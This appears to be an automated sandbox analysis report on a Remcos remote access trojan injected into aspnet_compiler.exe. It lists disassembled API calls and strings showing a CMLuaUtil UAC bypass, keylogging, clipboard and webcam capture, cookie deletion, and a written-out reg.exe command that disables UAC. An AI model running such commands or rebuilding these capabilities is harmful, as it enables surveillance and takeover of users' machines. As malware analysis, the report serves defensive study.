                                                          • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406835
                                                            • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                            • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                          • CoUninitialize.OLE32 ref: 0040688E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-1062857032
                                                          • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                          • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                          • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                          • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                          • int.LIBCPMT ref: 0040FEF2
                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: H]G
                                                          • API String ID: 2536120697-1717957184
                                                          • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                          • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                          • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                          • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                          • GetLastError.KERNEL32 ref: 0040B2EE
                                                          Strings
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                          • [Chrome Cookies not found], xrefs: 0040B308
                                                          • UserProfile, xrefs: 0040B2B4
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                          • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                          • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                          • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                          APIs
                                                          • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AllocOutputShowWindow
                                                          • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                          • API String ID: 2425139147-2527699604
                                                          • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                          • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                          • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                          • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                          Strings
                                                          • BG, xrefs: 00406909
                                                          • (CG, xrefs: 0040693F
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406927
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$BG
                                                          • API String ID: 0-4127071392
                                                          • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                          • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                          • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                          • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                          APIs
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                          • Sleep.KERNEL32(00002710), ref: 00419F79
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered$`#v
                                                          • API String ID: 614609389-3049340936
                                                          • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                          • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                          • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                          • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00439789
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                          • __allrem.LIBCMT ref: 004397BC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                          • __allrem.LIBCMT ref: 004397F1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                          • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                          • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                          • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                          • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                          • Opcode Fuzzy Hash: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                          • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 3509577899-3206640213
                                                          • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                          • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                          • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                          • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                            • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                          • API String ID: 3469354165-462540288
                                                          • Opcode ID: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                          • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                          • Opcode Fuzzy Hash: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                          • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                          • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                          • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                          • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                          • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                          • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                          • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                          • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                          • _free.LIBCMT ref: 00446EF6
                                                          • _free.LIBCMT ref: 00446F1E
                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                          • _abort.LIBCMT ref: 00446F3D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                          • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                          • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                          • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                          • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                          • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                          • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                          • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                          • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                          • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                          • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                          • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                          • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$DG
                                                          • API String ID: 3554306468-1089238109
                                                          • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                          • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                          • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                          • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                          APIs
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                          • API String ID: 2974294136-753205382
                                                          • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                          • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                          • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                          • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                          • wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                          • API String ID: 1497725170-248792730
                                                          • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                          • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                          • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                          • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                          • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: `AG
                                                          • API String ID: 1958988193-3058481221
                                                          • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                          • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                          • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                          • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                          • GetLastError.KERNEL32 ref: 0041CA91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                          • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                          • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                          • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                          • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                          • CloseHandle.KERNEL32(?), ref: 00406A14
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                          Memory Dump Source
